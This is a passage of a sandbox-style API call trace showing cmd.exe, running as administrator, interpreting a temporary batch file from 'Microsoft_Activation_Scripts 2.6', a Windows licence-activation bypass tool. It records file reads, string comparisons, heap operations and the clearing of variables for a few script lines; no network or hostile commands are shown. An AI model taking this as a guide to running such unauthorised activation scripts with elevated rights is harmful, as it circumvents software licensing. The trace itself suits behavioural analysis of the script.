[0178.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8a0) returned 1 [0178.404] GetProcessHeap () returned 0x19a8f1e0000 [0178.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0178.405] _get_osfhandle (_FileHandle=3) returned 0xac [0178.405] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0178.405] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.405] SetFilePointer (in: hFile=0xac, lDistanceToMove=6630, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0178.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\nt /b\r\nedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n an error\r\n\n") returned 2 [0178.405] _get_osfhandle (_FileHandle=3) returned 0xac [0178.405] GetFileType (hFile=0xac) returned 0x1 [0178.405] _get_osfhandle (_FileHandle=3) returned 0xac [0178.405] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0178.405] GetProcessHeap () returned 0x19a8f1e0000 [0178.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.406] GetProcessHeap () returned 0x19a8f1e0000 [0178.406] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.406] _tell (_FileHandle=3) returned 6630 [0178.406] _close (_FileHandle=3) returned 0 [0178.407] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.407] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.407] _get_osfhandle (_FileHandle=3) returned 0xac [0178.407] SetFilePointer (in: hFile=0xac, lDistanceToMove=6630, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0178.407] _get_osfhandle (_FileHandle=3) returned 0xac [0178.407] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0178.407] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.407] SetFilePointer (in: hFile=0xac, lDistanceToMove=6770, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0178.408] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0178.408] _get_osfhandle (_FileHandle=3) returned 0xac [0178.408] GetFileType (hFile=0xac) returned 0x1 [0178.408] _get_osfhandle (_FileHandle=3) returned 0xac [0178.408] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0178.408] GetProcessHeap () returned 0x19a8f1e0000 [0178.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.408] GetProcessHeap () returned 0x19a8f1e0000 [0178.408] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.408] _tell (_FileHandle=3) returned 6770 [0178.409] _close (_FileHandle=3) returned 0 [0178.409] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.411] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.411] _get_osfhandle (_FileHandle=3) returned 0xac [0178.411] SetFilePointer (in: hFile=0xac, lDistanceToMove=6770, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0178.411] _get_osfhandle (_FileHandle=3) returned 0xac [0178.411] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0178.411] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.411] SetFilePointer (in: hFile=0xac, lDistanceToMove=6772, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0178.411] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0178.411] _get_osfhandle (_FileHandle=3) returned 0xac [0178.411] GetFileType (hFile=0xac) returned 0x1 [0178.411] _get_osfhandle (_FileHandle=3) returned 0xac [0178.411] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0178.411] GetProcessHeap () returned 0x19a8f1e0000 [0178.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.411] GetProcessHeap () returned 0x19a8f1e0000 [0178.412] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.412] _tell (_FileHandle=3) returned 6772 [0178.412] _close (_FileHandle=3) returned 0 [0178.412] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.412] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.412] _get_osfhandle (_FileHandle=3) returned 0xac [0178.412] SetFilePointer (in: hFile=0xac, lDistanceToMove=6772, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0178.413] _get_osfhandle (_FileHandle=3) returned 0xac [0178.413] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0178.413] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.413] SetFilePointer (in: hFile=0xac, lDistanceToMove=6795, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0178.413] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Check for updates\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Check for updates\r\n===================================================================================================================\r\n") returned 23 [0178.413] _get_osfhandle (_FileHandle=3) returned 0xac [0178.413] GetFileType (hFile=0xac) returned 0x1 [0178.413] _get_osfhandle (_FileHandle=3) returned 0xac [0178.413] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0178.413] GetProcessHeap () returned 0x19a8f1e0000 [0178.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.413] GetProcessHeap () returned 0x19a8f1e0000 [0178.414] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.414] _tell (_FileHandle=3) returned 6795 [0178.414] _close (_FileHandle=3) returned 0 [0178.414] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.414] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.414] _get_osfhandle (_FileHandle=3) returned 0xac [0178.414] SetFilePointer (in: hFile=0xac, lDistanceToMove=6795, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0178.414] _get_osfhandle (_FileHandle=3) returned 0xac [0178.414] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0178.414] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.414] SetFilePointer (in: hFile=0xac, lDistanceToMove=6797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0178.414] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Check for updates\r\n===================================================================================================================\r\n") returned 2 [0178.414] _get_osfhandle (_FileHandle=3) returned 0xac [0178.414] GetFileType (hFile=0xac) returned 0x1 [0178.415] _get_osfhandle (_FileHandle=3) returned 0xac [0178.415] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0178.415] GetProcessHeap () returned 0x19a8f1e0000 [0178.415] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.415] GetProcessHeap () returned 0x19a8f1e0000 [0178.415] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.415] _tell (_FileHandle=3) returned 6797 [0178.415] _close (_FileHandle=3) returned 0 [0178.416] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.416] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.416] _get_osfhandle (_FileHandle=3) returned 0xac [0178.416] SetFilePointer (in: hFile=0xac, lDistanceToMove=6797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0178.416] _get_osfhandle (_FileHandle=3) returned 0xac [0178.416] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0178.416] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.416] SetFilePointer (in: hFile=0xac, lDistanceToMove=6805, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a95 [0178.416] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set -=\r\n", cbMultiByte=8, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set -=\r\nk for updates\r\n===================================================================================================================\r\n") returned 8 [0178.416] _get_osfhandle (_FileHandle=3) returned 0xac [0178.416] GetFileType (hFile=0xac) returned 0x1 [0178.416] _get_osfhandle (_FileHandle=3) returned 0xac [0178.416] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a95 [0178.417] GetProcessHeap () returned 0x19a8f1e0000 [0178.417] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.417] GetProcessHeap () returned 0x19a8f1e0000 [0178.417] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.417] _wcsicmp (_String1="set", _String2=")") returned 74 [0178.417] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0178.417] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0178.417] _wcsicmp (_String1="IF", _String2="set") returned -10 [0178.417] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0178.417] _wcsicmp (_String1="REM", _String2="set") returned -1 [0178.417] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0178.417] GetProcessHeap () returned 0x19a8f1e0000 [0178.417] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0178.417] GetProcessHeap () returned 0x19a8f1e0000 [0178.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc60 [0178.418] GetProcessHeap () returned 0x19a8f1e0000 [0178.418] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb20 [0178.418] _tell (_FileHandle=3) returned 6805 [0178.418] _close (_FileHandle=3) returned 0 [0178.418] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0178.418] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0178.418] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0178.418] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0178.418] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0178.418] _wcsicmp (_String1="set", _String2="CD") returned 16 [0178.418] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0178.418] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0178.418] _wcsicmp (_String1="set", _String2="REN") returned 1 [0178.418] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0178.418] _wcsicmp (_String1="set", _String2="SET") returned 0 [0178.418] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.429] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0178.429] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0178.429] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0178.429] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0178.429] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0178.429] _wcsicmp (_String1="set", _String2="CD") returned 16 [0178.429] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0178.429] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0178.429] _wcsicmp (_String1="set", _String2="REN") returned 1 [0178.429] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0178.429] _wcsicmp (_String1="set", _String2="SET") returned 0 [0178.429] GetProcessHeap () returned 0x19a8f1e0000 [0178.429] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb710 [0178.429] GetProcessHeap () returned 0x19a8f1e0000 [0178.429] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb710, Size=0x16) returned 0x19a8f1ecbe0 [0178.429] GetProcessHeap () returned 0x19a8f1e0000 [0178.429] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ecbe0) returned 0x16 [0178.429] wcsncmp (_String1="-", _String2="/", _MaxCount=0x4) returned -2 [0178.429] GetProcessHeap () returned 0x19a8f1e0000 [0178.429] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb8f0 [0178.429] _wcsnicmp (_String1="-=", _String2="/A", _MaxCount=0x2) returned -2 [0178.429] _wcsnicmp (_String1="-=", _String2="/P", _MaxCount=0x2) returned -2 [0178.429] SetEnvironmentVariableW (lpName="-", lpValue=0x0) returned 1 [0178.429] GetProcessHeap () returned 0x19a8f1e0000 [0178.430] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0178.430] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0178.430] GetProcessHeap () returned 0x19a8f1e0000 [0178.430] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f206860 [0178.430] memcpy (in: _Dst=0x19a8f206860, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f206860) returned 0x19a8f206860 [0178.430] FreeEnvironmentStringsA (penv="=") returned 1 [0178.430] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.430] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0178.440] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.440] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0178.441] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.441] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.441] SetConsoleInputExeNameW () returned 0x1 [0178.441] GetConsoleOutputCP () returned 0x1b5 [0178.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.441] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.442] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.442] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.442] _get_osfhandle (_FileHandle=3) returned 0xac [0178.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=6805, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a95 [0178.442] GetProcessHeap () returned 0x19a8f1e0000 [0178.443] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.443] GetProcessHeap () returned 0x19a8f1e0000 [0178.443] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbe0) returned 1 [0178.443] GetProcessHeap () returned 0x19a8f1e0000 [0178.443] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb20) returned 1 [0178.443] GetProcessHeap () returned 0x19a8f1e0000 [0178.443] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc60) returned 1 [0178.443] GetProcessHeap () returned 0x19a8f1e0000 [0178.444] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0178.444] _get_osfhandle (_FileHandle=3) returned 0xac [0178.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a95 [0178.444] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=6815, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a9f [0178.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set old=\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set old=\r\nfor updates\r\n===================================================================================================================\r\n") returned 10 [0178.444] _get_osfhandle (_FileHandle=3) returned 0xac [0178.445] GetFileType (hFile=0xac) returned 0x1 [0178.445] _get_osfhandle (_FileHandle=3) returned 0xac [0178.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a9f [0178.445] GetProcessHeap () returned 0x19a8f1e0000 [0178.445] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0178.445] GetProcessHeap () returned 0x19a8f1e0000 [0178.446] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0178.446] _wcsicmp (_String1="set", _String2=")") returned 74 [0178.446] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0178.446] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0178.446] _wcsicmp (_String1="IF", _String2="set") returned -10 [0178.446] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0178.446] _wcsicmp (_String1="REM", _String2="set") returned -1 [0178.446] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0178.446] GetProcessHeap () returned 0x19a8f1e0000 [0178.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0178.446] GetProcessHeap () returned 0x19a8f1e0000 [0178.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd40 [0178.446] GetProcessHeap () returned 0x19a8f1e0000 [0178.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0178.447] _tell (_FileHandle=3) returned 6815 [0178.447] _close (_FileHandle=3) returned 0 [0178.447] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0178.447] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0178.447] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0178.447] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0178.447] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0178.447] _wcsicmp (_String1="set", _String2="CD") returned 16 [0178.447] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0178.447] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0178.447] _wcsicmp (_String1="set", _String2="REN") returned 1 [0178.447] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0178.447] _wcsicmp (_String1="set", _String2="SET") returned 0 [0178.447] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.448] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0178.448] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0178.448] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0178.448] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0178.448] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0178.448] _wcsicmp (_String1="set", _String2="CD") returned 16 [0178.448] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0178.448] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0178.448] _wcsicmp (_String1="set", _String2="REN") returned 1 [0178.448] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0178.448] _wcsicmp (_String1="set", _String2="SET") returned 0 [0178.448] GetProcessHeap () returned 0x19a8f1e0000 [0178.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb770 [0178.448] GetProcessHeap () returned 0x19a8f1e0000 [0178.448] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb770, Size=0x1a) returned 0x19a8f1eb860 [0178.448] GetProcessHeap () returned 0x19a8f1e0000 [0178.448] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x1a [0178.448] wcsncmp (_String1="old", _String2="/", _MaxCount=0x4) returned 64 [0178.448] GetProcessHeap () returned 0x19a8f1e0000 [0178.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb9e0 [0178.448] _wcsnicmp (_String1="ol", _String2="/A", _MaxCount=0x2) returned 64 [0178.448] _wcsnicmp (_String1="ol", _String2="/P", _MaxCount=0x2) returned 64 [0178.448] SetEnvironmentVariableW (lpName="old", lpValue=0x0) returned 1 [0178.448] GetProcessHeap () returned 0x19a8f1e0000 [0178.450] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.450] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0178.450] GetProcessHeap () returned 0x19a8f1e0000 [0178.450] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f206860 [0178.450] memcpy (in: _Dst=0x19a8f206860, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f206860) returned 0x19a8f206860 [0178.450] FreeEnvironmentStringsA (penv="=") returned 1 [0178.450] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.450] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0178.450] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.450] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0178.450] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.450] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.451] SetConsoleInputExeNameW () returned 0x1 [0178.451] GetConsoleOutputCP () returned 0x1b5 [0178.451] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.451] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.451] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.452] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.452] _get_osfhandle (_FileHandle=3) returned 0xac [0178.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=6815, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a9f [0178.452] GetProcessHeap () returned 0x19a8f1e0000 